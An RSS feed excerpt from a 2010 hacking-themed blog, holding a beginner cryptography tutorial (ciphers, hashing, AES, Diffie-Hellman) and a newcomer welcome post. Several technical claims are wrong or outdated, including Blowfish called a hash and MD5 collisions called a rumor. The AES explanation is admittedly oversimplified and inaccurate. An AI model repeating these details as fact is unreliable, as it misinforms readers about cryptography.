&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;Thanks for reading this tutorial, I consider it an &quot;open source&quot; article  so feel free to copy, amend and reproduce it. :)&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;Regards,&lt;/span&gt;&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;</description><link>http://amit-spot.blogspot.com/2010/11/very-basic-view-on-sql-injections.html</link><author>noreply@blogger.com (Amit Tyagi)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgzOHz-1o5ieS7RGLnbWjtarpQTGiFtEr_pbRy1dcwBOfhZLQIl5RwZeuBwt0rQe8NJNzHHwCKUvnDC-wbnevL0U_uLSgfZoS_CTwOEDvUfn25R5MhjudAuPgKoCptQh9-DrHax4-kXO-c/s72-c/sql.jpg" height="72" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-4201259273499093708.post-6829287119821315290</guid><pubDate>Thu, 11 Nov 2010 17:56:00 +0000</pubDate><atom:updated>2010-11-13T02:53:26.448-08:00</atom:updated><title>Cryptography - The Next Few Steps</title><description>&lt;table border=&quot;0&quot; cellpadding=&quot;3&quot; cellspacing=&quot;2&quot;&gt;&lt;tbody&gt;
&lt;tr style=&quot;color: lime;&quot;&gt;&lt;td class=&quot;light-td&quot; colspan=&quot;2&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiv0_RmFjtuzWy4y0IV7CpK14KkHA2356lybJM-dplekQdH8WkGQCLMTxdoXXuH61iLcZ5O65SEQwuBsdC0AA7UmOMzypvq1iMYRi41RX8Eff2XnhWlq8bZg2bav47CHruint_l2iOAUVQ/s1600/crpt.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiv0_RmFjtuzWy4y0IV7CpK14KkHA2356lybJM-dplekQdH8WkGQCLMTxdoXXuH61iLcZ5O65SEQwuBsdC0AA7UmOMzypvq1iMYRi41RX8Eff2XnhWlq8bZg2bav47CHruint_l2iOAUVQ/s1600/crpt.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;i&gt;&lt;span style=&quot;font-size: 18px;&quot;&gt;      &lt;b&gt;&lt;br /&gt;
&lt;/b&gt;     &lt;/span&gt;&lt;/i&gt;    &lt;/td&gt;   &lt;/tr&gt;
&lt;tr&gt;    &lt;td class=&quot;dark-td&quot; colspan=&quot;2&quot; style=&quot;font-size: 10px;&quot;&gt;&lt;/td&gt;   &lt;/tr&gt;
&lt;tr&gt;    &lt;td align=&quot;left&quot; class=&quot;light-td&quot; colspan=&quot;2&quot; style=&quot;font-size: 12px;&quot;&gt;&lt;div align=&quot;left&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;So first off, for those of you looking for the  very basics of cryptography, I would like to recommend taking a look at  Arrexels article &quot;Cryptography- The VERY Basics.&quot; It is a nice little  article on a simple form of encrypting messages, though we will briefly  go over this method here as well.&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;Alright then! Cryptography is essentially the art of protecting  information. It does so by changing the information into an unreadable  form (as opposed to Steganography, which simply hides the existence of  such information). One of the simplest ways to do this is what is called  &quot;Monoalphabetic Substitution.&quot;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;&lt;i style=&quot;color: lime;&quot;&gt;&lt;b&gt;Monoalphabetic Substitution&lt;/b&gt;&lt;/i&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;This form is what is described in Arrexels article. Essentially, the  idea is to replace letters with other letters in a predetermined  fashion. For instance, we can make a lookup table for encrypting and  decrypting in this system like so:&lt;/span&gt;&lt;br /&gt;
&lt;div style=&quot;color: yellow;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;a b c d e f g h i j k l m n o p q r s t u v w x y z&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;color: yellow;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;b c d e f g h i j k l m n o p q r s t u v w x y z a&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-size: small;&quot;&gt;If we want to encrypt the word &quot;plaintext,&quot; we first take the first  letter, p, and look it up in the first row of our table, and find the  letter right below it: q. So &quot;p&quot; becomes &quot;q.&quot; Doing this lookup all the  way through gives the encrypted form: &quot;qmbjoufyu.&quot; To reverse the  process, look at the second row of the table, and find the corresponding  letter in the first row. &lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;This type of code is vulnerable to frequency analysis, and, more  interestingly, things called Markov Chain Monte Carlo Methods . For computer security, it  is therefore rather impractical&lt;/span&gt;. &lt;br /&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;&lt;i style=&quot;color: lime;&quot;&gt;&lt;b&gt;Polyalphabetic Substitution&lt;/b&gt;&lt;/i&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;In the above example, only one ciphertext alphabet (as the second row  above is called) was used. In the case of Polyalphabetic Substitution,  more than one is used. One way to do this is to apply one alphabet to  every other letter starting with the first one, and another alphabet for  every other letter starting with the second. This may be a little  confusing, so here is an example. First, let us make a pair of look up  tables:&lt;/span&gt;&lt;br /&gt;
&lt;div style=&quot;color: yellow;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;a b c d e f g h i j k l m n o p q r s t u v w x y z&lt;/span&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;color: yellow;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt; b c d e f g h i j k l m n o p q r s t u v w x y z a&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-size: small;&quot;&gt;and:&lt;/span&gt;&lt;br /&gt;
&lt;div style=&quot;color: yellow;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;a b c d e f g h i j k l m n o p q r s t u v w x y z&lt;/span&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;color: yellow;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt; c d e f g h i j k l m n o p q r s t u v w x y z a b&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-size: small;&quot;&gt;where we want to encode &quot;plaintext&quot; again. So, we take the first letter  &quot;p&quot;, and look it up in the first lookup table. As before, it turns into  &quot;q.&quot; For the second letter, we use the second lookup table, turning &quot;l&quot;  into &quot;n.&quot; For the third letter, we use the first table again, and so on.  Proceeding in this way we get: qnbkovfzu.&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;As you can see, the letter &quot;t&quot; is encoded as a &quot;v&quot; in one place and a  &quot;u&quot; in another. Naturally, this sort of code is more secure than  Monoalphabetic Substitution. It is still, however, vulnerable to  (modified) frequency analysis, and a version of the MCMC Methods. So  again, it is rather impractical.&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;&lt;i&gt;&lt;b style=&quot;color: lime;&quot;&gt;Transposition&lt;/b&gt;&lt;/i&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;Transposition is an entirely different type of beast altogether. With a  transposition cipher, rather than changing letters to different letters  with a lookup table, you just move the letters around. For instance, say  we want to encrypt, as per usual, &quot;plaintext.&quot; Let us write the word  in, say, two columns:&lt;/span&gt;&lt;br /&gt;
&lt;div style=&quot;color: yellow;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;p t&lt;/span&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;color: yellow;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt; l e&lt;/span&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;color: yellow;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt; a x&lt;/span&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;color: yellow;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt; i t&lt;/span&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;color: yellow;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt; n&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-size: small;&quot;&gt;Now, we simply read off the rows as our encrypted text. In this case, it  would be: &quot;pt le ax it n.&quot;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;This is just an example. As you can imagine, there are many, many ways  of scrambling the letters (362,880 different ways for &quot;plaintext&quot; as a  matter of fact). However, computers are fast enough to unscramble such  things without too much trouble, so, in addition to some other  considerations (which we will get to), modern cryptography does not  employ this method either.&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;&lt;i style=&quot;color: lime;&quot;&gt;&lt;br /&gt;
&lt;b&gt;A special note on hashing&lt;/b&gt;&lt;/i&gt;&lt;/span&gt; &lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;For hackers, one of the most important types of cryptography you may  encounter is that of hashing. Hashing refers to encrypting something SO  WELL that no one, I mean no one, can get the original information back  again. Think of it as one way coding, that is, once you ENcode it, you  cannot DEcode it. You may be asking yourself, &quot;Now why on earth would  you want to do such at thing? Encrypt information so that no one can  ever read it again? Preposterous!&quot; But fear not! there is a rational  reason to do this.&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;Say you have a password that only you know, and you want to keep it in a  not-so-secure place. This password is very important to you though, as  it allows you to log on to your computer. How can your computer compare  the password you enter when logging on, to the password you stored in a  not-so-secure place, without letting anyone see what your password  actually is? The answer is hashing. Consider this algorithm:&lt;/span&gt;&lt;br /&gt;
&lt;div style=&quot;background-color: black; color: black;&quot;&gt;&lt;span style=&quot;background-color: white; font-size: small;&quot;&gt;1. Hash your stored password.&lt;/span&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;background-color: black; color: black;&quot;&gt;&lt;span style=&quot;background-color: white; font-size: small;&quot;&gt; 2. Put in the not-so-secure place.&lt;/span&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;background-color: black; color: black;&quot;&gt;&lt;span style=&quot;background-color: white; font-size: small;&quot;&gt; 3. Next time you log on, hash the password you enter.&lt;/span&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;background-color: black; color: black;&quot;&gt;&lt;span style=&quot;background-color: white; font-size: small;&quot;&gt; 4. Compare the entered password hash to the stored password hash.&lt;/span&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;background-color: black; color: black;&quot;&gt;&lt;span style=&quot;background-color: white; font-size: small;&quot;&gt;&lt;span style=&quot;background-color: black;&quot;&gt; &lt;span style=&quot;background-color: white;&quot;&gt;5. If they are the same, you get logged on, otherwise, you stay locked  out&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;background-color: white;&quot;&gt;.&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-size: small;&quot;&gt;As you can see, the computer can check to see if your password matches  without storing the password in a readable state. Some common hashing  algorithms are MD5, SHA 1, and Blowfish (I have heard tell, though, that  it was recently shown that two different passwords may have the same  hash in MD5, but that could just be a rumor).&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&quot;But wait,&quot; you say, &quot;I&#39;ve done several several Realistic challenges  where I have decoded hashes! What is going on??&quot; Well, when you  &quot;decoded&quot; those hashes what you were actually doing is is taking every  possible letter combination, encrypting that as a hash, and comparing it  to the hash you saved. So you were not decoding per se, but rather  checking to see what text gets encoded as your saved hash. Basically,  you cheated.&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;&lt;i style=&quot;color: lime;&quot;&gt;&lt;b&gt;AES/Rijndael&lt;/b&gt;*&lt;/i&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;Rijndael (prounounced rain-doll) is the encryption standard used by the  United States government. As you can imagine, it is very complicated. I  will briefly explain (in VERY basic terms), but I will have to assume  some knowledge of some Group Theory, binary, and XORing. Anyone who is  familiar with AES, understand, I am about to GREATLY oversimplify the  algorithm for the sake of clarity, and you will have to forgive me. I  know this is not exactly the way it works, but I think this explanation  covers the underlying process in an edifying and &lt;i&gt;understandable&lt;/i&gt;  way.&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;First, start out with your message, and a password to encrypt it with.  Convert it to binary. Call the binary &quot;m.&quot; XOR your &quot;m&quot; with your  password &quot;k.&quot; Call the result &quot;y.&quot;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;Now for the meat of the AES. AES involves a few functions I will call  &quot;MixColumns,&quot; &quot;ShiftRows,&quot; and &quot;SubBytes.&quot; Do not worry about what they  do for now, we will get to that in a second. Lets call the AES output  &quot;c.&quot; Then:&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;c = k XOR MixColumns(ShiftRows(SubBytes(y)))&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;Great! Now, for what those functions actually do...&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b style=&quot;color: lime;&quot;&gt;&lt;i&gt;SubBytes&lt;/i&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;For this, we will be working in the field  &lt;/span&gt;&lt;span style=&quot;color: blue; font-size: small;&quot;&gt;Z_2[x]/&amp;lt;x^8+x^4+x^3+x+1&amp;gt;. Z_2[x]&lt;/span&gt;&lt;span style=&quot;font-size: small;&quot;&gt; is the ring of polynomials with  coefficients being either 0 or 1. Since &lt;/span&gt;&lt;span style=&quot;color: blue; font-size: small;&quot;&gt;x^8+x^4+x^3+x+1&lt;/span&gt;&lt;span style=&quot;font-size: small;&quot;&gt; is an  irreducible polynomial, we know that &lt;/span&gt;&lt;span style=&quot;color: blue; font-size: small;&quot;&gt;Z_2[x]/&amp;lt;x^8+x^4+x^3+x+1&amp;gt;&lt;/span&gt;&lt;span style=&quot;font-size: small;&quot;&gt; will  be a field. We will call this field &quot;F.&quot; Nuff said.&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;Here comes the binary part (other than XORing, of course). Take one byte  of &quot;y&quot; and make every zero or one the coefficient in a polynomial in F.  For instance, say your byte is 10110101. Then your polynomial will be &lt;/span&gt;&lt;br /&gt;
&lt;div style=&quot;color: yellow;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;x^7 + 0x^6 + x^5 + x^4 + 0x^3 + x^2 + 0x + 1 &lt;/span&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;color: yellow;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt; = x^7 + x^5 + x^4 + x^2 + 1&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-size: small;&quot;&gt;Now, since F is a field, we know that all elements in it (except for  zero, of course) have an inverse. SubBytes finds this inverse, and  replaces the original byte with the one generated by the inverse  polynomial (just like we found the polynomial from the byte, we can do  the reverse and find a byte from a polynomial).&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b style=&quot;color: lime;&quot;&gt;&lt;i&gt;ShiftRows&lt;/i&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;ShiftRows step is a transposition step. It writes the bytes in blocks of  16, and &quot;shifts the rows&quot;:&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;div style=&quot;color: yellow;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;1  5  9   13&lt;/span&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;color: yellow;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt; 2  6  10  14&lt;/span&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;color: yellow;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt; 3  7  11  15&lt;/span&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;color: blue; font-size: small;&quot;&gt; 4  8  12  16&lt;/span&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br style=&quot;color: blue;&quot; /&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;turns into&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;div style=&quot;color: yellow;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;1   5   9   13&lt;/span&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;color: yellow;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt; 6   10  14  2&lt;/span&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;color: yellow;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt; 11  15  3   7&lt;/span&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;color: yellow;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt; 16  4   8   12&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;Then it reads off the columns as the new order in each block.&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b style=&quot;color: lime;&quot;&gt;&lt;i&gt;MixColumns&lt;/i&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;MixColumns is like SubBytes, except this time, we are working in the  field F[t]/&amp;lt;t^4+1&amp;gt;. Moreover, you do not use single bytes, you use  groups of four bytes. The first byte determines the coefficient of t^3,  the second determines the coefficient of t^2 and so on. Then you  multiply this by a given polynomial also in this field, and use the  result as your new set of four bytes.&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;And there you have it! AES/Rijndael in basic, abbreviated form. If you  want some more details, you can try the Wikipedia page on AES, though  that is a little thick. Otherwise, PM me if you have basic questions,  and if there is enough demand, I will write an article just on AES.&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;&lt;i style=&quot;color: lime;&quot;&gt;&lt;b&gt;Public Key Cryptography&lt;/b&gt;&lt;/i&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;And finally, here is the mainstay of cryptography today. Since I do not  want this article to be a book, I will cover the Diffie-Hellman Key  exchange, and if you guys want to know about RSA, PM me or let me know  and I might do an article on that.&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b style=&quot;color: lime;&quot;&gt;&lt;i&gt;The Problem&lt;/i&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;In all the past sections, I have described crypto-systems that have a  fatal flaw: the require a code book, of some sort or another. With  substitution ciphers, you have the lookup tables. With Transposition,  you have how you scrambled the letters. With AES, you have the password.  And the problem with code books is, both the sender and the receiver of  the coded message have to have a copy. If two people are communicating  over insecure channels, and they wish to begin exchanging coded  messages, how can they do so? If one of them sends a code book over the  insecure channel, an eavesdropper will have a copy as well. What to do,  what to do...&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b style=&quot;color: lime;&quot;&gt;&lt;i&gt;The Solution&lt;/i&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;Public Key Cryptography. Say Alice and Bob wanna exchange password  protected emails using AES. How do they arrange to get the same password  without sending it to each other? One good way is called the  Diffie-Hellman Key Exchange. Now, this gets a little complicated, so I  recommend you write it down as you read, like taking notes, so you can  really understand it. I think you will find that while it looks scary,  its really quite simple.&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;Alice picks a number &quot;e,&quot; a number &quot;p&quot; and a number d. Then she  calculates e^d mod p, or in english, the remainder of e raised to the  power of d when divided by p (if you do not understand this, look up  modular arithmetic). Let us call this number &quot;a&quot; for Alice. Then, Alice  sends e, p, and a to Bob, but keeps &quot;d&quot; a secret. Bob then picks a  number &quot;c&quot; to keep secret for himself. After that, he finds e^c mod p  (let us call it &quot;b&quot; for Bob), and sends it to Alice. Next, Alice raises b  to the d (mod p), and Bob raises a to the c (mod p). So, written out,  we have:&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;a^c = (e^d mod p)^c = e^(dc) mod p&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;for Bob, and &lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;b^d = (e^c mod p)^d = e^(dc) mod p&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;for Alice. You will notice that in the end, both Alice and Bob have the  same number. This is their very own secret password, that no one but  they know.&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;At first, this may not seem to be secure. After all, you&#39;re broadcasting  what a and b are right? So shouldnt an eavesdropper be able to figure  out what d and c are? Technically yes. But this problem is referred to  as &quot;The Discrete Log Problem&quot; in mathematics, and is notoriously  difficult. Let me give you an example.&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;Let e = 7, p = 11, and 7^c mod 11 = 10. What is c? PM me for the answer.&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;&lt;i style=&quot;color: lime;&quot;&gt;&lt;b&gt;Conclusion&lt;/b&gt;&lt;/i&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;Ok then, thus concludes my overview of cryptography. I hope it was basic  enough for those just starting out, and that those more advanced  learned something too. If you have any questions, enjoyed this article,  or would like an article on some other topic, either comment, or PM me, I  will try to answer as best I can. Thank you!&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;</description><link>http://amit-spot.blogspot.com/2010/11/cryptography-next-few-steps.html</link><author>noreply@blogger.com (Amit Tyagi)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiv0_RmFjtuzWy4y0IV7CpK14KkHA2356lybJM-dplekQdH8WkGQCLMTxdoXXuH61iLcZ5O65SEQwuBsdC0AA7UmOMzypvq1iMYRi41RX8Eff2XnhWlq8bZg2bav47CHruint_l2iOAUVQ/s72-c/crpt.jpg" height="72" width="72"/><thr:total>1</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-4201259273499093708.post-7182414629327707060</guid><pubDate>Thu, 11 Nov 2010 17:38:00 +0000</pubDate><atom:updated>2010-11-13T02:23:05.161-08:00</atom:updated><title>A Welcome to Newcomers-</title><description>&lt;table border=&quot;0&quot; cellpadding=&quot;3&quot; cellspacing=&quot;2&quot;&gt;&lt;tbody&gt;
&lt;tr style=&quot;color: lime;&quot;&gt;&lt;td class=&quot;light-td&quot; colspan=&quot;2&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;i&gt;&lt;span style=&quot;font-size: 18px;&quot;&gt;      &lt;b&gt;&lt;br /&gt;
&lt;/b&gt;     &lt;/span&gt;&lt;/i&gt;&lt;/span&gt;    &lt;/td&gt;   &lt;/tr&gt;
&lt;tr&gt;    &lt;td class=&quot;dark-td&quot; colspan=&quot;2&quot; style=&quot;font-size: 10px;&quot;&gt;&lt;br /&gt;
&lt;/td&gt;   &lt;/tr&gt;
&lt;tr&gt;    &lt;td align=&quot;left&quot; class=&quot;light-td&quot; colspan=&quot;2&quot; style=&quot;font-size: 12px;&quot;&gt;&lt;div align=&quot;left&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhR8QsfmvsSJAcsLismv9GMHoUSVFsO_PjtutUODYhEIaw1Kpr_ow8Qm3B9kmBWgQKQESyxSzcFJ01fkjNKgixMekceSQvWxXQcxzcSapGQWpojpJYxGkiplWiapYx5Ju_kS8fdUDK9icA/s1600/havcker.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhR8QsfmvsSJAcsLismv9GMHoUSVFsO_PjtutUODYhEIaw1Kpr_ow8Qm3B9kmBWgQKQESyxSzcFJ01fkjNKgixMekceSQvWxXQcxzcSapGQWpojpJYxGkiplWiapYx5Ju_kS8fdUDK9icA/s1600/havcker.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-size: small;&quot;&gt;Hey guys, Amit Tyagi here, so howdy, howdy, howdy!&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;I&#39;ve been seeing a lot of trolling on websites recently about people being newbs (n00b, nub, etc). And all those other  spellings of the same damn word that makes you believe the person saying  it is so fresh in virginity he should be in the produce isle.&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;&lt;i style=&quot;color: lime;&quot;&gt;&lt;b&gt;Case in point:&lt;/b&gt;&lt;/i&gt;&lt;/span&gt;&lt;span style=&quot;font-size: small;&quot;&gt; I wanted to post something here to defend and help the  little guy (being one myself that is, I mean, take a look at my rank and  my involvement in the community, I&#39;m not exactly a celebrity). Asking  for help and support is the greatest thing you can ever do. &quot;Without  questions there are no answers&quot; is a great quote. We&#39;ve all heard this  one &quot;If at first you don&#39;t succeed, try try again&quot; It&#39;s true. Being a  hacker is all about problem-solving, tinkering, working with and around  things that fascinate us. So please use HTS to tinker, not harm or get  overly-frustrated at, but to work with and grow in what we all are proud  of.&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
